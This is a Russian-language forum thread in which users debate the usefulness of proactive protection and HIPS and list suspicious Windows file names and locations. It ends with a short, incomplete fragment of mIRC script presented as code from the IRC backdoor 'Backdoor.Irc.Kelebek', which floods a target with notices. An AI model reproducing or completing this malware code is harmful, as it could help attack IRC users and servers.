Проактивная защита, HIPS

ArtMoney всякие она будет резать, если не регулировать. Но так всякие гадости вроде "Запуск из папки Windows" и "Создание своей копии в папке Windows" конечно должно резатся автоматом. На то и нужна, что бы ловить то, чего ещё нет в базах.

Проактивка приличного антивируса справляется с определенным процентом угроз. Но всегда есть шансы пропустить какой-то троян, бекдор или червь. Получить какую-то дрянь типа "Downloader" в памяти.

Кстати, раньше в Касперском была компонент "Проактивная защита" - сейчас нет.
У Аваст был Экран поведения, сейчас его нет.

Для большинства пользователей она бесполезна по-моему. Она не выдает вердикт в отличие от компонента Файловый антивирус - "обнаружена угроза" или "угроз не обнаружено" . Она только предупреждает, что программа выполняет действие, характерное для вредоносного ПО. Но фишка в том, что это действие может выполнять и невредоносное ПО.

Проактивная защита просто предупреждает - рискнуть и разрешить ? Или не рисковать и запретить ?

Что такое защита ? Это обнаружение и запрет выполнения вредоносного кода, который причинит вред. Сначала этот код обнаружить надо. Этим занимается Файловый антивирус.

Проактивная защита этим не занимается, это не сигнатурный и не эвристический анализ. В некоторых случаях она может позволить пользователю предположить, что данная программа скорее всего опасная. Но это уже зависит от пользователя - какие выводы он будет делать. Проактивная защита предупредила - а дальше сам решай, что делать.

Denis Nikonov
Проактивная защита просто предупреждает - рискнуть и разрешить ? Или не рисковать и запретить ?

Во первых, отдельные угрозы могут быть введены в категорию хорошо известных проактивке файлов. Во вторых, у каких-то антивирусов вообще нет стандартно функции "спросить", все действия выполняются согласно правилам.

Проактивка конечно от много не спасет. Убил мне троян файервол Винды, восстановление системы не помогло, пришлось качать фикс от Мелкософта.

VITYA_KOLYADENKO , используй Shadow Defender . Защищенный режим. После перезагрузки компьютера всё, что троян испортил, будет восстановлено.

Есть учетная запись с ограниченными правами, программы там запущенные не могут менять системные настройки (и имеют еще много ограничений) и грохнуть винду. Нафига тогда проактивка ?

Проактивка конечно от много не спасет

Ну почему же, в проактивке есть "разрешить", "спросить", "запретить". Можно поставить "запретить" и тогда троян не навредит. Зависит от того, какая проактивка и какой троян. Программа может перестать работать, так как ей что-то запретили, но если эта программа вредоносная, то троян либо не навредит, либо причинит мало урона .

Denis Nikonov
Можно поставить "запретить" и тогда троян не навредит. Зависит от того, какая проактивка и какой троян.

У Вас какой антивирус? Вы верите, что его проактивка реагирует на 100% троянов/вирусов?

Я не использую антивирус. У меня Malware Defender стоит (firewall+HIPS ) .
Проактивка по другому работает, она не обнаруживает вирусы и трояны. У неё другая цель - отслеживать определенные операции - перехват нажатия клавиш, загрузка драйвера, запись в файл hosts, прямой доступ к диску в обход файловой системы, внедрение кода в доверенный процесс и т.д.
Для обнаружения вирусов и троянов используют сигнатурный, эвристический анализ, эмуляцию кода, облако (KSN ) и т.д.

С настройками по умолчанию проактивка обычно не реагирует, потому что пользователю фиолетово какой поток создал процесс в другом процессе и какой драйвер собираются загрузить (о чем может писать проактивка). Ему надо знать - обнаружена ли угроза или не обнаружена.

Если проактивка задает вопросы часто - пользователю это надоест и он просто нажмет "доверяю программе, разрешить всё", что в приниципе равноценно отключению проактивной защиты. Поэтому проактивка иногда что-то пишет. В антивирусе аваст её вообще убрали, там был экран поведения.

Вообщем, проактивная защита предупредила "нажатия клавиш будут перехватываться" - а дальше сам решаешь -
- рискнуть и разрешить (если там троян - значит не повезло и пароли могут украсть ) (если нет трояна - значит повезло и пароли не украдут)
- запретить и отправить файл в вирлаб . Дождаться ответа и если они ответят - файл безопасен - можно разрешить.
Или запустить на виртуалке, на компе, где нечего воровать и смотреть что дальше программа делает .

Denis Nikonov
С настройками по умолчанию проактивка обычно не реагирует, потому что пользователю фиолетово какой поток создал процесс в другом процессе и какой драйвер собираются загрузить (о чем может писать проактивка). Ему надо знать - обнаружена ли угроза или не обнаружена.

У меня нормально реагирует. Конечно не на 100% угроз и даже не на 50%. Создание левого файла SysWOW64\win*.exe - это достаточно подозрительное действие. И файла cmd32.exe там тоже не должно быть. И много других названий совсем мутными могут быть (но Вы не отличите мутное название от xpsrchvw.exe). А svchost.exe там ровно 1 и ничего типа suchost.exe не должно быть.
И файл ядра с названием nt*.exe там скорее исключение, sc*.exe не слишком много (в System32 не многим больше), как и файлов vs*.exe (тем более - с названием типа *L3cq4e.exe) или ms*.exe.
Но про это я писал неделю назад в теме svchost_-_chto_eto-853130/
А в самой папке Windows у меня 12 приложений, так что я догадаюсь, если на что-то лишнее реагирует проактивка. Ещё есть целых 3 dll - тоже сложно подсунуть совсем левую *9x.dll или 4 других dll-файла сразу.
З.Ы. И нормальный файл не прописывает в реестр свой запуск из папки AppData\Local\Temp, там в корне целых 3 исполняемых, bat-файлы там долго не лежат. И из корзины никто себя не запускает. И из других странных папок в папке Windows - тоже наверное.
З.З.Ы. Вот нашел про драйвер:
http://s018.radikal.ru/i502/1502/50/94051036e787t.jpg

А вот Вам код настоящей вредоносной программы (Backdoor.Irc.Kelebek):
on 1:join:*: {
if ($server == %hucumserver) {
if ($chan == %hucumkanal) {
if ($server !== irc.hayta.net) {
timer 1 10 raw part %hucumkanal
timer 8 0 notice %hucumhedef %hucummesaj
.timer 1 20 .saldirisifirla
.timer 1 20 .server $read(server.txt)
halt
}
}
}
}